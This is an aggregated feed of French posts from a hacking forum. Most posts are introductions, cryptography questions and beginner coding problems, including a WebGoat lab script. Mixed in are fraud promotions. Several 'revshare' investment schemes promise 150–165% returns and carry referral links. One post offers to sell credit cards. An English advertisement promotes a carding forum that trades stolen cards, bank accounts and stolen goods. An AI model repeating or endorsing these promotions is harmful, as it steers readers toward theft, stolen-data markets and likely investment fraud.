Le RSA dans les deux sens

Bonsoir,

Je me posais une question sur le RSA, je vois son fonctionnement en temps normal (chiffrement avec la clé publique et déchiffrement avec la clé privée) mais je pense qu'il peut également fonctionner dans l'autre sens.

C'est à dire chiffrement avec la clé privée et déchiffrement avec la clé publique.

Est bien exact ?

Si oui, pouvez vous m'expliquer comment fonctionne les maths derrières ?

Merci beaucoup.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1lBdgL3
via IFTTT

Newest movie this month?

I want to watch a movie, but don't know which is better, i have no time to search a lot of information in internet sea. Thank you very much!


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q6hNBX
via IFTTT

mercredi 9 décembre 2015

le moment ou tu transpires quand tu dois prendre la parole devant tout le monde..

... heureusement c'est plus facile en ligne

Pseudo : caldera

Connaissances informatiques générales : j'ai fait un ctrl c + ctrl v pour copier coller la présentation

Plus sérieusement : des bases en réseaux. 0 en programmation, j'aimerai bien apprendre un si vaste domaine d'ailleurs.

Connaissances en hacking : quelques bases, je suis passé par le crack wifi, et pas mal d'expériences sur kali pas toujours poussé a fond, j'ai buté sur la rogue AP pour un truc tout bete je pense, j'ai découvert nmap qui m'a vraiment plu, j'ai utilisé hydra, etc.. en ce qui concerne windows c'est souvent une passoire comme vous le savez... avis personnel je trouve les mac assez bien niveau sécurité si on réfléchit et qu'on les utilisent bien.

Système d'exploitation principal : MAC OSX, KALI depuis peu, les lignes de commandes c'est dur au début, mais quand tu commences a comprendre et que ca fait ce que tu veux tu te dis que c'est pas mal du tout.

Je viens sur ce forum pour : apprendre des trucs, faire des expériences, apprendre a mieux me proteger. pour rencontrer des gens virtuellement ou en vrai, pour apprendre toujours apprendre

J'ai connu ce forum via : un moteur de recherche

Informations supplémentaires (job, intérêts, autres...) : centre d'intéret (depuis plusieurs mois) la sécurité informatique justement, j'aimerai me former ici et ailleurs pour travailler dans ce milieu. je découvre aussi ce qu'est le monde du logiciel libre.

voila je pense qu'on aura l'occasion de se parler sur le forum et vous en saurez plus sur moi. je suis un mec tranquil, ca ne sera pas mon seul post ici, apprenons dans la joie et la bonne humeur !

le forum m'a l'air bien fourni et propre, qu'il continue ainsi (avec moi dedans) :):)


Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1YYAwAL
via IFTTT

mardi 8 décembre 2015

Signature El Gamal

Bonjour à tous,

j'étais à la recherche d'exercices traitant de la signature d'El Gamal et j'ai trouvé un exercice assez intéressant.
Le problème c'est que je n'arrive pas à le résoudre, je ne sais même pas par où commencer. Alors toute sera la bienvenue.
Voici donc l'énoncé:

On suppose que le chiffrement de El-Gamal est utilisé sans vérifier si 0 < r < p. On
suppose que l’attaquant connaît la signature (r, s) d’un message m. Soit m′ un message
arbitraire et s′ =sα avec α=H(m′)*H(m)^(-1) mod p-1
a) Trouver deux équations vérifiées par r′ ( l’une modulo p et l’autre modulo p − 1)
telles que (r′, s′) soit une signature de m′.
b) Comment peut on résoudre ces équations?



Merci d'avance :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ltoIIw
via IFTTT

lundi 7 décembre 2015

Créé une API de test

Bonjour,

Je bosse sur un projet de monitoring pour mon raspberry pi, actuellement je rencontre une difficulté car je doit sans cesse uploader mon code sur la raspberry pour pouvoir le tester. J'ai donc pour projet de crée une API de test directement sur mon ordinateur mais je ne sais pas trop comment m'y prendre.
Via Lamp ? Ou bien est il plus simple de crée carrément un serveur web sur ma machine pour tester ?

J'utilise un machine sous Linux ( base Ubuntu )

Merci d'avance.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1R4Rr2Y
via IFTTT

dimanche 6 décembre 2015

ToojO se présente

Bonjour à toutes et tous !

Pseudo : ToojO ( Vous en doutiez ? ;))
Connaissances informatiques générales : J'ai connaissances des grandes lignes informatiques, principalement sur windows...
Connaissances en hacking : 0 c'est pour cela que je suis ici.
Système d'exploitation principal : Actuellement Windows 7 et une vielle bécane qui marche avec Ubuntu.
Je viens sur ce forum pour : M'instruire ! Je ne suis pas ici à attendre qu'on me place la fourchette à la bouche pour manger, mais évoluer en allant chercher les infos moi même et par la suite, aider.
J'ai connu ce forum via : Moteur de recherche.
Informations supplémentaires : Technicien de Maintenance, j'apprécie le football US ! J'aime les choses bien faites.


Voilà pour ma part à bientôt sur le forum !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SHVjoc
via IFTTT

HQRevshare

Revshare lancé le 8 aout 2015 l'admin est le singapourien Mohamad Han
Facebook : http://ift.tt/1XT3ZJL

4 packs de pub disponibles par palier (il faut avoir au moins 100 packs d'une catégorie pour passer à la suivante) :
Begginer packs$5 expirent à $7.50 soit un ROI de 150% donne 10.000 Ad Credits + 50 Directory Listing
Basic packs $10 expirent à $15.30 soit un ROI de 153% donne 20.000 Ad Credits + 100 Directory Listing
Advance packs $20 expirent à $31 soit un ROI de 155% donne 40.000 Ad Credits + 200 Directory Listing
Expert packs $40 expirent à $63.20 soit un ROI de 158% donne 60.000 Ad Credits + 400 Directory Listing

Le ROI est atteint sur une durée indeterminée qui dépend de l'activité du site mais les gains se situent actuellement dans une fourchette de 3% à 7% par jour.
Nombre de packs maximum : 500 par catégorie sauf Expert = 1000
30% de re-purchase 70% en cash
12% de commissions de parrainage sur les packs de vos filleuls directs et 30% sur leurs clics PTC : un programme de parrainage au dessus de la moyenne habituelle.

Section PTC accessible gratuitement avec des clics rémunérés jusqu'à 1 cent donc trés intéressant pour les amateurs de PTC.

Paiements et retaits PayPal Payza STP PM BTC vérifiés
Site sous cloudfare et DDOS, serveur ultra rapide.
Excellent éditeur de bannières.

Statistiques à fin octobre 2015:
51,983 Quality Members
$11,627,465.00 Total Purchases (Only Adpack purchases and including Main & RP balance)
$2,790,074.13 Total Cashout
6,516 Alexa Rank

Parrainage

12% sur les packs + 30% sur les clics

Infos sur les paiements

Paypal Payza STP PM BTC cashout à $5 mini et maxi $188 paiements en 24H maxi (jours ouvrables) mais certain paiements sont instantanés
Frais de dépots : BTC 0% / PM 3% / Paypal STP 4% / payza 5%
Frais de retraits : 2% sur tous les processeurs

Les moyens de paiement sur le site HQRevshare sont :

Paypal
Perfect Money
Payza
Solid Trust Pay


Autres infos

Langue du site : Anglais
Nombre d'utilisateurs : 59000


Avis sur le site

Une interface simple, claire, tres facile à utiliser.
Un pack unique accessible, gain journalier et retour sur investissement très correct.
Des membres qui affluent de jour en jour (65000 actuellement )
La réputation de ce programme n'est plus a faire !

Lien d'incription:http://ift.tt/1HODjYU
Skype: terrribleyou


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1XT3ZJN
via IFTTT

ADCASHOUT Revshare

Description

Lancement le 11 décembre 2015
L'admin est Emma Victoria Buxton
La société est AdCashout LTD Registered & Located At 56 GEORGES ROAD, LONDON, E10 5RQ

Un pack unique à $5 mais 3 niveaux de maturité du pack en fonction du nombre de packs achetés :

de 1 à 200 packs = les packs expirent à $7.25 soit 145% de ROI
de 201 à 1000 packs = les packs expirent à $7.50 soit 150% de ROI
1001 packs et + = les packs expirent à $7.75 soit 155% de ROI

3 niveaux de membership :

Basic partner : gratuit. 10 clics à faire par jour. Retrait maxi $100. Retraits manuels. Pas de remise sur les surf free plans ni d'abondement sur les achats de crédits pub. Pas de crédit pub inlcus.

Standard partner : $5 / mois. 5 clics à faire par jour. Retrait maxi $200. Retraits automatiques. 50% de remise sur les surf free plans. Abondement de 50% sur les achats de crédits pub. Crédits pub inclus : 5000 crédits surf / mois + 10 000 crédits bannières / mois + 10 000 crédits text ads / mois + 1000 crédits login ads / mois.

Premium partner : $10 / mois. pas de clics à faire. Retrait maxi $500. Retraits automatiques. 100% de remise sur les surf free plans. Abondement de 100% sur les achats de crédits pub. Crédits pub inclus : 12000 crédits surf / mois + 24 000 crédits bannières / mois + 24 000 crédits text ads / mois + 2200 crédits login ads / mois.

95% des recettes de ventes de packs et crédits publicitaires réalisées sur le site sont partagés chaque heure.
Pas de repurchase obligatoire.

Parrainage

Parrainage sur 2 niveaux pour les packs :
de 1 à 100 filleuls : 6% / 2%
de 101 à 500 filleuls : 7% / 3%
Au delà : 10% / 5%

Parrainage sur 1 niveau pour les abonnements :
Basic partner : 10%
Standard partner : 15%
Premium partner : 20%

Infos sur les paiements

Cashout à $3
Membres non upgradés : délai de 24h
Membres upgradés : paiement instantanés
Paypal est disponible UNIQUEMENT pour les achats de crédits pub hors packs et pour les retraits
Tous les processeurs de paiements sont annoncés comme Business verified

Les moyens de paiement sur le site adcashout sont :

Paypal
Payeer
Perfect Money
Payza
Solid Trust Pay
BitCoins


Autres infos

Langue du site : Anglais
Nombre d'utilisateurs : 200

Lien d'incription : http://ift.tt/1XT3ZJH
Skype : terrribleyou


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1HODjYS
via IFTTT

samedi 5 décembre 2015

LES NOUVEAUX LOUPS DU WEB -Film Documentaire.

Bonjour :D

Bon c'est plus un partage qu'autre chose que je vous propose aujourd'hui d'autant plus que c'est la première fois que je post sur cette section du forum, mais je suis tomber sur ça, et je pense que sa vaut quand même un minimum d'attention.


Les Nouveaux Loups Du Web, est un film documentaire qui sortira en France le 6 Janvier au Cinéma, et ce n'est ni plus ni moins que la traduction en français du film : "Terms and Conditions May Apply", un documentaire destiné au grand publique, nous informant sur Google, Facebook, les gouvernements, et notre vie privée.

Pourquoi sortir ce film en 2016 ? Car il démontre avec talent ce qui est dénoncé dans la campagne : Dégooglisons internet (Framasoft), à savoir qu’accepter ces Conditions Générales d’Utilisation abusives revient souvent pour les utilisateurs à perdre une part non négligeable de leurs libertés fondamentales (droit à l’intimité et à la vie privée, notamment).


Sachez également que l'avant première sera animée par un membre de La Quadrature Du Net, ainsi qu'un membre de Framasoft.

Sur ce je vous laisse avec le synopsis et la bande annonce du film :


" Avez vous déjà lu les conditions générales d’utilisation des données privées présentes sur chaque site internet que vous visitez, ou sur les applications que vous utilisez ?
Bien sûr que non. Et pourtant, ces mentions autorisent les entreprises à utiliser vos informations personnelles dans un cadre au-delà de votre imagination. Le film vous révèle ce que les entreprises et les gouvernements vous soustraient en toute légalité, à partir du moment où vous avez cliqué sur « J’accepte », et les conséquences scandaleuses qui en découlent.
"



Liens utiles



Sur ce, bon film !

:D


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/21ErZFf
via IFTTT

vendredi 4 décembre 2015

Présentation membre DKOD

Bonjour la communauté,

Pseudo : DKOD
Connaissances informatiques générales : Réseau, script bash.
Connaissances en hacking : non
Système d'exploitation principal : Linux et win.
Je viens sur ce forum pour : apprendre le hacking pour mieux me proteger.
J'ai connu ce forum via : internet
Informations supplémentaires (job, intérêts, autres...) : Je travaille dans le domaine des télécoms, mes passions sont les nouvelles technologies, les radios amateurs (en préparation pour l'obtention de la licence) et la photographies.

Voilou... Je tiens à féliciter la team Hackademics pour le travail accompli. Cela faisait un moment que j'etais à la recherche d'une communauté francophone pour apprendre et partager mes futurs expériences au sujet du hacking et de la sécurité.

A très vite pour vous lire... :)

Bien cordialement,
DKOD ;)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1NN67Ub
via IFTTT

RevShareMax se faire de l'argent rapidement!!

Revshare & PTC sera lancé le 12 Décembre 2015
Facebook : http://ift.tt/1OLM1Xg

4 adpacks disponibles par palier (il faut acheter 50 packs à 5$ pour avoir accés aux packs à 10$ et ainsi de suite).

* Basic packs $5 expire à $7.50 (ROI 150%) donne 10.000 Ad Credits + 50 Directory Listing

* Bronze packs $10 expire à $15.50 (ROI 155%) donne 20.000 Ad Credits + 100 Directory Listing

* Silver packs $20 expire à $32.00 (ROI 160%) donne 40.000 Ad Credits + 200 Directory Listing

* Gold packs $40 expire $66.00 (ROI 165%) donne 85.000 Ad Credits + 450 Directory Listing

Un programme d'affiliation:
12% de commissions de parrainage sur les packs achetés par vos filleuls directs

Moyens de Paiements : PayPal,Payza .

Retrait mini $2 maxi $150 .
Le site est en pré lancement j'actualiserai la fiche au fur et à mesure pour toutes les personnes qui s'inscriront avant le 12 décembre un pack de 5$ sera offert à la veille du lancement, 234 inscrits pour les moments.

Lien d'incription:http://ift.tt/1IuYcbx
Skype :terrribleyou


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OLLZPi
via IFTTT

[Demande] OSCP certification

Bonjour à tous,

Quelqu'un a des liens ou peut partager des ressources (vidéos & ebook) concernant cette formation ?

Histoire de m'en faire une idée précise sans bruler le porte monnaie

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OKDdkm
via IFTTT

jeudi 3 décembre 2015

éteindre un ordinateur à distance avec cmd ?

Bonjour tout le monde, récemment j'ai entendu des "hackers" se vanter en disant qu'il pouvait éteindre à distance un ordinateur du lycée avec cmd.

Je voulais savoir si c'était possible et si oui comment faire?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1O5BXpl
via IFTTT

mardi 1 décembre 2015

Pirate du gouvernement

Bonsoir.

Pour la Russie, c'est bien connu. Pour les US, on les soupçonne d'être derrière Stuxnet.

Mais alors qui sont ces hackers experts qui travaillent pour les gouvernements et les services de renseignement ?
Pensez-vous que la France dispose d'une telle 'armée' ?

Qui sont les embauchés ? Des petits génies de 20 ans ? Je n'y crois pas, du moins pas que. Je pense plutôt à des ingénieurs informatiques excellents et des chercheurs.
CF master spécialisé ESIEA, ou autre.


Qu'en pensez-vous ?

Lâchez-vous.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1XFclVf
via IFTTT

Présentation 6x6

Bonjour à tous !

Pseudo : 6x6

Connaissances informatiques générales : La base je pense, un peu de c++, html/css, scheme et python.

Connaissances en hacking : Débutant et j'espère ne pas le rester longtemps.

Système d'exploitation principal : Windows7

Je viens sur ce forum pour : Apprendre encore et toujours. Et le hacking m'a l'air d'être un domaine assez vaste pour pas qu'on s’ennuie. :D

J'ai connu ce forum via : le forum du site root-me.

Informations supplémentaires (job, intérêts, autres...) : Job ? En recherche. Intérêts ? Beaucoup de choses vu que je lis quasi tout ce qui me passe sous la main.

En espérant passer un bon moment ici parmi vous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PXS1PS
via IFTTT

lundi 30 novembre 2015

Se protéger contre le MITM

Bonjour ! Je voulais savoir si il y à d'autre alternatives aux cookies qui puissent nous protéger contre ces fameuses
"cookie injection" ! Oh, et est-ce qu'il y d'autres moyens de se défendre face au MITM à part le SSL ?

Merci d'avance pour toutes vos réponses !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1OAxX2I
via IFTTT

dimanche 29 novembre 2015

présentation pat1395

bonjour a tous merci de me permettre d integrer le forum .
je debute vraimant dans ce domaine je ne pourrais malheureusement rien vous apporter dans l immediat mais je compte rapidement progresser pour vous aider un max.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SpZ2GV
via IFTTT

samedi 28 novembre 2015

Demande Card.

Bonjours/Bonsoir,

Je me demandais si il y avait un endroit spéciale pour faire des ventes ( CC ect.. )

Si il en existe, je me proposerais pour faire des ventes ^^

Pour les interesser tout de suite, Add skype : Snoopy.legend


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1IgLKfq
via IFTTT

Code::Blocks

Bonjour tout le monde,

J'ai un problème : je viens d'installé Code::Blocks 13.12 et je veux faire un projet avec la console d'application en langage C, mais lorsque je veux l'utiliser rien ne s'affiche sur la console même le programme de debut ne marche pas :

#include <stdio.h>
#include <stdlib.h>

int main()
{
printf("Hello world!\n");
return 0;
}

la console s'affiche mais il n'y a rien d'écrit dedans :confused:

Est ce que quelqu'un a déjà eu ce problème? Ou est ce que quelqu'un a une idée de quoi cela peut venir?

Merci d'essayer de m'aider

P.S. : avant d'installer Code::Blocks j'ai "jouer" un peu avec le cmd(essayer un peut toute les commandes) je ne sais
pas si cela peut affecter la réalisation de programme sur la console


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LF9KE0
via IFTTT

vendredi 27 novembre 2015

Partenariat journalduhacker.com

Demande de partenariat

J'aimerais vous présentez mon nouveau site francophone sur les dernière vulnérabilité , technologie , tous ce qui se rapporte au Hacking.

Aucunement Blackhat ou illegal seulement de l'information.

Journalduhacker.com


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1PSHghI
via IFTTT

jeudi 26 novembre 2015

exercice de recherche de mot par expression regulière

bonjour a tous, je suis tombé sur un exercice très intéressant dont je vous met l'énoncé ici:

Écrivez un programme cherche qui fonctionne comme la commande grep de UNIX : elle prend pour
arguments une expression régulière et une liste de fichiers et elle parcourt ces fichiers à la recherche de textes qui
correspondent à l’expression régulière. Lorsque de tels textes sont trouvés, elle affiche le nom de fichier, le
numéro de la ligne et la ligne contenant le texte en question.
L’expression régulière et la liste de fichiers seront indiquées à votre programme à travers les arguments de la
ligne de commande.
Par exemple, la commande suivante recherche dans le fichier « data1.txt » du répertoire courant toutes les
lignes commençant par la lettre « L » et terminant par un « s » :
$ python cherche.py "L.*s" data1.txt
data1.txt:14:Les sablettes
data1.txt:72:Les lones
data1.txt:112:Lorgues
data1.txt:120:Le cannet des maures

j'ai éssayé de le faire mais je bloque a certains enndroits,j'aimerai que ce qui sont intéressé essayent de le faire et partagent leur code et pour ceux qui trouvent des erreur due au plantage du mien,qu'ils le signalent et m'aide a l'améliorer afin de sortir un produit parfait et qui fonctionne ,merci.


Code:

import sys,os
import re

liste_fichier=[]
expression=sys.argv[1]

def usage():
        print("Usage: [Regex] [fichier1] [fichier2] [fichier^N]")
while len(sys.argv) != len(liste_fichier)+1:
        usage()
        break       
regex=re.compile(expression)
di=os.getcwd()+"\\"
for i in sys.argv[2:]:
        liste_fichier.append(di+i)
        print(di+i)
def fonction_parcour(regex,i):  # fonction d'analyse de fichiers "i" represente un fichier dans la liste
        j=1                        # variable 'j' qui compte le nombre de ligne dans le fichier
        dic={}                                                # dictionnaire de retour de la fonction
        try:
                f=open(i,"r")
        except:
                print("Problème d'ouverture du fichier")
                usage()
                exit(0)
        for c_ligne in f.readline():# boucle de parcour de chaque ligne du fichier
                if c_ligne=="":
                        break
                liste_cores_ligne=regex.findall(c_ligne) # recherche des correspondances de la Regex dans la ligne en cour
                if liste_cores_ligne is []:
                        pass
                elif liste_cores_ligne is not []:       
                        dic[i+" : "+str(j)+ c_ligne]=liste_cores_ligne                # ajout du compteur de ligne 'j' et de la liste de corespdance ds le diction d retour "dic"
                        #print(liste_cores_ligne)
                        j+=1
                else:
                        print("aucune correspondance dans le fichier")       
        f.close()                                  # Fermerture du fichier a la fin d'analyse du ficiher
        return dic                                  # on retourne le dictionnaire a la fin de l'analyse

for fichier in liste_fichier:        # Pour chacun des fichiers dans la liste de fichier,
        dico_de_retour=fonction_parcour(regex,fichier)  # on appel la fonction de parcours sur chaque fichier
        print("fin d'analyse du fichier {}".format(fichier.strip(os.getcwd())))
        for cle,valeur in dico_de_retour.items():
                print(cle,"=",valeur)

print("#########################")
print("#exo de rech_expr      #")               
print("#  26-11-2015 Pytohs    #")
print("#########################")



from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1LCQwig
via IFTTT

mercredi 25 novembre 2015

Ma présentation.

Bonjour à tous,
Je n'ai pas de compétence en informatique, mais je m'intéresse de plus en plus au hacking. Je suis ici pour apprendre et
je compte sur vous et sur votre patience pour m'aider.
Merci d'avance. :confused:


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jjYt5m
via IFTTT

Présentation de Greenmonitor

Pseudo : Greenmonitor
Connaissances informatiques générales : TCP/IP , quelques bases en langage C et Python , à l'aise avec linux et windows
Connaissances en hacking : Débutant en pentesting
Système d'exploitation principal : Linux Ubuntu 14.04
Je viens sur ce forum pour : Approfondir mes connaissances et apprendre de nouvelles choses
J'ai connu ce forum via : La chaîne YouTube
Informations supplémentaires : Je suis Étudiant passionné par l'informatique depuis environ 4 mois.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jjYrdA
via IFTTT

mardi 24 novembre 2015

Botnet: accès caché au serveur

Bonjour à tous.

Un question me turlupine. Comment font les botnets évolués (stuxnet et autres) pour cacher l'accès au serveur ?

Autrement dit, je trouverais ça vraiment absurde de mettre le mot de passe ou même l'ip du serveur dans le code source. Les white-hat n'ont plus qu'à décompiler puis DDOs pour faire chuter le serveur.

Quelle méthodes concrètes sont utilisées ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1jirn5E
via IFTTT

Présentation Bilboy69

Bonjour à tous!
Depuis 1 an je me suis pris au jeu de la sécurité informatique. Depuis j'y pense tous les jours. Ça fait un bout de temps que je traîne sur le forum et il est temps de faire ma prez. Je précise que j'ai 18 ans. J'aime particulièrement le viro, surement dû au côté ingénieux et créatif.

Pseudo (+autres si plusieurs) :
  • bilboy69


Connaissances informatiques générales :
  • Prog: C, VB.NET, Python, Java
  • WEB: PHP, Javascript, Html5/CSS3, bases de sql (postgres)
  • Réseaux: les bases, un semestre de cours (encapsulation, protocoles essentiels des couches OSI, analyse de trame)
  • Autres: VHDL, bases d'ASM x86, osek/VDX Trampoline (embarqué)
  • Linux & Windows



Connaissances en hacking :
Je suis encore débutant. Bien sûr je me suis amusé avec Kali. Je sais comment fonctionnent les attaques usuelles. Mais ce qui m'intéresse le plus c'est la partie développement: J'adore le concept du Buffer-Overflow et la virologie.

Système d'exploitation principal :
  1. Windows 7

  1. Linux (Ubuntu ou Kali)



Je viens sur ce forum pour :
  • Premièrement rencontrer des gens qui aiment ça et en discuter.
  • Partager
  • Faire des projets de groupe, m'investir quoi. Y'a ça ici ?


J'ai connu ce forum via :
  • Google


Informations supplémentaires (job, intérêts, autres...) :
  • J'ai 18 ans, et la musique est mon autre grande passion. Un jour il faudra choisir :p
  • Assez d'infos comme ça.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Td3bPl
via IFTTT

lundi 23 novembre 2015

Hola ! c'est voynich !

Salut tout le monde,

Pseudo : voynich (et rarement) : voycham

Connaissances informatiques générales : moyen, linux ubuntu, création de sites web et configuration et préparation élémentaire de windows

Connaissances en hacking : nul, je débute

Système d'exploitation principal : linux ubuntu

Je viens sur ce forum pour : acquérir des cours et tutos, notamment en sécurité informatique et aussi en hacking

J'ai connu ce forum via : publicité sur un site web

Informations supplémentaires (job, intérêts, autres...) : au chômage, je m’intéresse surtout a l'informatique mais aussi en dehors de ça, aux phénomènes paranormaux, notamment mystères du passé et cryptozoologie


P.S je condamne fermement les attentas de paris ...


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1kQxZdq
via IFTTT

Trouver la clef de chiffrment

Bonjour,
Je débute en hacking et j'ai une question qui m'est venu en tête. Est-il possible de trouver la clef de chiffrement d'un mot si l'on connais ce mot et ce mot chiffré?
Par exemple un mot de passe et ce mot de passe crypté.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Yq9NN9
via IFTTT

dimanche 22 novembre 2015

Netsky.pw - good crd forum

Good day! I am glad to present a carding forum with open registration NetSky!

Working since 2013.01.01. Recently experienced major structure and design changes. Number of users is about 20,000, daily online - 400-600 people. Main domain - NETSKY.PW, reserve - SKY-FRAUD.RU.
Commercial section presents private information vendors (credit cards, bank accountsm payment systems), anonymity and security tools vendors (VPN, SOCKS, SSH-tunnels), buying up stolen stuff, hosters and many other trusted services.
Forum is international - there are discussion sections both in Eussian and English. Own jabber-server @xmpp.name.
Garant is currently working in manual mode. Also establishing an automated system using BTC.
There is a system of reward in cash form for unique articles each week. No closed sections, no special statuses.

Direct link: http://netsky.pw/

I will gladly answer your questions! Waiting for you in our forum. :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1I54Y7D
via IFTTT

Probleme avec Python et Webgoat

Bonjour,

Je suis entrain de tester Webgoat avec python. J’arrive apparemment a me connecter avec l'identifiant et le mot de passe "user" , ensuite j’atterris sur la page "how to work with webgoat". Par après j'ai essaye de rentrer dans un menu a gauche "numeric sql injection", mais il me met sur une autre URL que celle que je lui ai demandé. Aprés plusieurs (jours) d'essais et de recherche sur google je bloque.... Qu’est ce que j'ai bien pu louper!
Je précise que j'ai essaye avec DVWA(damn vulnerable web application) et la j’arrive sans problèmes a naviguer dans les différents menus.

Voici le script TEST pour Webgoat:
Code:

import mechanize

br = mechanize.Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Mozilla/5.0 Compatible')]

url ="http://localhost:9090/WebGoat/login.mvc"
br.open(url)
for form in br.forms():
    print "\nFORM NAME:",form.name
    print "\nFORMS:",form
print "====================================================================="
print "OPENING:",br.geturl()
print "====================================================================="
print "\nSOURCE:",br.response().read()
print "====================================================================="


br.select_form(nr=0)
br.form["username"] = "guest"
br.form["password"] = "guest"
br.submit()
for form in br.forms():
    print "\nFORM NAME:",form.name
    print "\nFORMS:",form
print "====================================================================="
print "\OPENING:",br.geturl()
print "====================================================================="
print "\nSOURCE:",br.response().read()
print "====================================================================="


url ="http://localhost:9090/WebGoat/attack?Screen=20&menu=1100"
br.open(url)
for form in br.forms():
    print "\nFORM NAME:",form.name
    print "\nFORMS:",form
print "====================================================================="
print "\OPENING:",br.geturl()
print "====================================================================="
print "\nSOURCE:",br.response().read()
print "====================================================================="

Et son résultat dans le terminal:
Citation:

FORM NAME: loginForm

FORMS: <loginForm POST http://localhost:9090/WebGoat/j_spri...0DCA28BB145DCB application/x-www-form-urlencoded
<TextControl(username=)>
<PasswordControl(password=)>
<HiddenControl(=) (readonly)>
<SubmitButtonControl(<None>=) (readonly)>>
=====================================================================
OPENING: http://localhost:9090/WebGoat/login.mvc
=====================================================================

SOURCE:
<html>
<head>
<title>Login Page</title>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!-->

<!-- CSS -->
<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"/>
<!-- Bootstrap core CSS -->
<link rel="stylesheet" href="plugins/bootstrap/css/bootstrap.min.css"/>
<!-- Fonts from Font Awsome -->
<link rel="stylesheet" href="css/font-awesome.min.css"/>
<!-- CSS Animate -->
<link rel="stylesheet" href="css/animate.css"/>
<!-- Custom styles for this theme -->
<link rel="stylesheet" href="css/main.css"/>
<!-- end of CSS -->


</style>
</head>
<body onload='document.loginForm.username.focus();'>
<section id="container" ng-controller="goatLesson">
<header id="header">
<!--logo start-->
<div class="brand">
<a href="/WebGoat/start.mvc" class="logo"><span>Web</span>Goat</a>
</div>
<!--logo end-->
<div class="toggle-navigation toggle-left">

</div><!--toggle navigation end-->
<div class="lessonTitle" >
<h1 id="lessonTitle">Please login</h1>
</div><!--lesson title end-->

</header>
<section class="main-content-wrapper">

<section id="main-content" >


<br/><br/>
<form role="form" name='loginForm' action="j_spring_security_check;jsessionid=0FFB738E89ABF49ADF0DCA28BB145DCB" method='POST' style="width: 400px;">
<div class="form-group">
<label for="exampleInputEmail1">Username</label>
<input type="text" class="form-control" id="exampleInputEmail1" placeholder="Username" name='username'>
</div>
<div class="form-group">
<label for="exampleInputPassword1">Password</label>
<input type="password" class="form-control" id="exampleInputPassword1" placeholder="Password" name='password'>
</div>


<input type="hidden" name=""
value="" />
<button class="btn btn-large btn-primary" type="submit">Sign in</button>
</form>
<br/><br/>
<h4>The following accounts are built into Webgoat</h4>
<table class="table table-bordered" style="width:400px;">
<thead>
<tr class="warning"><th>Account</th><th>User</th><th>Password</th></tr>
</thead>
<tbody>
<tr><td>Webgoat User</td><td>guest</td><td>guest</td></tr>
<tr><td>Webgoat Admin</td><td>webgoat</td><td>webgoat</td></tr>
</tbody>
</table>
<br/><br/>


</section>
</section>
</section>


</body>
</html>
=====================================================================
=====================================================================
\OPENING: http://localhost:9090/WebGoat/start.mvc
=====================================================================

SOURCE:




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://ift.tt/nuHeHq;
<html xmlns="http://ift.tt/z3Mkxh;
<head>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
